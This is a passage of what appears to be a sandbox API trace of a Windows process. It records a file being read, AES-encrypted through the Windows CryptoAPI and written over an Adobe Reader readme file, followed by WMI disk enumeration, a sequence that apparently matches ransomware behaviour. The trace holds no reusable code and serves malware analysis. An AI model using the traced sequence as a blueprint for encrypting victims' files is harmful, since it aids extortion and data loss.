[0203.617] GetFileType (hFile=0x32c) returned 0x1 [0203.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0203.617] GetFileType (hFile=0x32c) returned 0x1 [0203.617] GetFileSize (in: hFile=0x32c, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x4444 [0203.617] ReadFile (in: hFile=0x32c, lpBuffer=0x363ae84, nNumberOfBytesToRead=0x4444, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x363ae84*, lpNumberOfBytesRead=0x8f6eedc*=0x4444, lpOverlapped=0x0) returned 1 [0203.620] CloseHandle (hObject=0x32c) returned 1 [0203.620] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0xbe00b8) returned 1 [0203.621] CryptGenRandom (in: hProv=0xbe00b8, dwLen=0x10, pbBuffer=0x363f98c | out: pbBuffer=0x363f98c) returned 1 [0204.287] CryptImportKey (in: hProv=0xbe00b8, pbData=0x35fd594, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7f710) returned 1 [0204.287] CryptContextAddRef (hProv=0xbe00b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0204.287] CryptContextAddRef (hProv=0xbe00b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0204.287] CryptDuplicateKey (in: hKey=0xb7f710, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7f310) returned 1 [0204.287] CryptContextAddRef (hProv=0xbe00b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0204.287] CryptSetKeyParam (hKey=0xb7f310, dwParam=0x4, pbData=0x35fd674*=0x1, dwFlags=0x0) returned 1 [0204.287] CryptSetKeyParam (hKey=0xb7f310, dwParam=0x1, pbData=0x35fd640, dwFlags=0x0) returned 1 [0204.287] CryptEncrypt (in: hKey=0xb7f310, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x35fd684*, pdwDataLen=0x8f6eea8*=0x4450, dwBufLen=0x4450 | out: pbData=0x35fd684*, pdwDataLen=0x8f6eea8*=0x4450) returned 1 [0204.288] CryptEncrypt (in: hKey=0xb7f310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3601af8*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x3601af8*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0204.289] CryptDestroyKey (hKey=0xb7f710) returned 1 [0204.289] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0204.289] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0204.290] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm", lpFilePart=0x0) returned 0x36 [0204.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0204.290] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmepol.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a8 [0204.320] GetFileType (hFile=0x4a8) returned 0x1 [0204.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0204.320] GetFileType (hFile=0x4a8) returned 0x1 [0204.320] WriteFile (in: hFile=0x4a8, lpBuffer=0x36041c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x36041c0*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0204.321] CloseHandle (hObject=0x4a8) returned 1 [0204.322] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0204.322] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0204.322] CoTaskMemFree (pv=0xbed438) [0204.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0204.322] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0204.322] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0204.322] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0204.322] IUnknown:Release (This=0xb51e34) returned 0x1 [0204.323] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x6027190) returned 0x0 [0204.323] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027190, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0204.323] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027190, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x6030c50) returned 0x0 [0204.323] WbemDefPath:IUnknown:Release (This=0x6027190) returned 0x0 [0204.323] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x6030c50) returned 0x0 [0204.323] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0204.324] WbemDefPath:IUnknown:AddRef (This=0x6030c50) returned 0x3 [0204.324] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0204.324] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0204.324] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0x66ce338) returned 0x0 [0204.324] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce338, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0204.324] WbemDefPath:IUnknown:Release (This=0x66ce338) returned 0x3 [0204.324] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0204.324] CoGetContextToken (in: pToken=0x8f6dee8 | out: pToken=0x8f6dee8) returned 0x0 [0204.324] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0204.324] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0204.324] WbemDefPath:IUnknown:Release (This=0x6030c50) returned 0x2 [0204.324] WbemDefPath:IUnknown:Release (This=0x6030c50) returned 0x1 [0204.324] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0204.324] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0204.324] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x6030c50) returned 0x0 [0204.324] WbemDefPath:IUnknown:AddRef (This=0x6030c50) returned 0x3 [0204.324] WbemDefPath:IUnknown:Release (This=0x6030c50) returned 0x2 [0204.324] WbemDefPath:IWbemPath:SetText (This=0x6030c50, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0204.324] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030c50, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0204.324] WbemDefPath:IWbemPath:GetText (in: This=0x6030c50, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0204.324] WbemDefPath:IWbemPath:GetText (in: This=0x6030c50, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0204.325] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030c50, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0204.325] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030c50, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0204.325] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030c50, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0204.325] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030c50, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0204.325] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030c50, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0204.325] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0204.325] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0204.325] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0204.325] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0204.325] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0204.325] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0204.325] IUnknown:Release (This=0xb51e34) returned 0x1 [0204.326] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x60271e0) returned 0x0 [0204.326] WbemDefPath:IUnknown:QueryInterface (in: This=0x60271e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0204.326] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60271e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6030be0) returned 0x0 [0204.326] WbemDefPath:IUnknown:Release (This=0x60271e0) returned 0x0 [0204.326] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6030be0) returned 0x0 [0204.326] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0204.326] WbemDefPath:IUnknown:AddRef (This=0x6030be0) returned 0x3 [0204.326] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0204.326] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0204.326] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0x66ce3a8) returned 0x0 [0204.327] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce3a8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0204.327] WbemDefPath:IUnknown:Release (This=0x66ce3a8) returned 0x3 [0204.327] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0204.327] CoGetContextToken (in: pToken=0x8f6de30 | out: pToken=0x8f6de30) returned 0x0 [0204.327] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0204.327] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0204.327] WbemDefPath:IUnknown:Release (This=0x6030be0) returned 0x2 [0204.327] WbemDefPath:IUnknown:Release (This=0x6030be0) returned 0x1 [0204.327] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0204.327] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0204.327] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6030be0) returned 0x0 [0204.327] WbemDefPath:IUnknown:AddRef (This=0x6030be0) returned 0x3 [0204.327] WbemDefPath:IUnknown:Release (This=0x6030be0) returned 0x2 [0204.327] WbemDefPath:IWbemPath:SetText (This=0x6030be0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0204.327] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030be0, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0204.327] WbemDefPath:IWbemPath:GetText (in: This=0x6030be0, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0204.327] WbemDefPath:IWbemPath:GetText (in: This=0x6030be0, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0204.327] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0204.327] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0204.327] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0204.328] IUnknown:Release (This=0xb51e34) returned 0x1 [0204.328] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x601f3a8) returned 0x0 [0204.328] WbemLocator:IUnknown:QueryInterface (in: This=0x601f3a8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0204.328] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f3a8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x6027220) returned 0x0 [0204.328] WbemLocator:IUnknown:Release (This=0x601f3a8) returned 0x0 [0204.328] WbemLocator:IUnknown:QueryInterface (in: This=0x6027220, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x6027220) returned 0x0 [0204.329] WbemLocator:IUnknown:QueryInterface (in: This=0x6027220, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0204.329] WbemLocator:IUnknown:AddRef (This=0x6027220) returned 0x3 [0204.329] WbemLocator:IUnknown:QueryInterface (in: This=0x6027220, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0204.329] WbemLocator:IUnknown:QueryInterface (in: This=0x6027220, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0204.329] WbemLocator:IUnknown:QueryInterface (in: This=0x6027220, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0204.329] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0204.329] CoGetContextToken (in: pToken=0x8f6e110 | out: pToken=0x8f6e110) returned 0x0 [0204.329] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0204.329] WbemLocator:IUnknown:QueryInterface (in: This=0x6027220, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0204.329] WbemLocator:IUnknown:Release (This=0x6027220) returned 0x2 [0204.329] WbemLocator:IUnknown:Release (This=0x6027220) returned 0x1 [0204.329] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0204.329] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0204.329] WbemLocator:IUnknown:QueryInterface (in: This=0x6027220, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x6027220) returned 0x0 [0204.329] WbemLocator:IUnknown:AddRef (This=0x6027220) returned 0x3 [0204.329] WbemLocator:IUnknown:Release (This=0x6027220) returned 0x2 [0204.329] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030be0, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0204.329] WbemDefPath:IWbemPath:GetText (in: This=0x6030be0, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0204.329] WbemDefPath:IWbemPath:GetText (in: This=0x6030be0, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0204.330] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x60272a0) returned 0x0 [0204.330] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60272a0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x60331bc) returned 0x0 [0204.712] WbemLocator:IUnknown:QueryInterface (in: This=0x60331bc, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5ae64) returned 0x0 [0204.712] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5ae64, pProxy=0x60331bc, 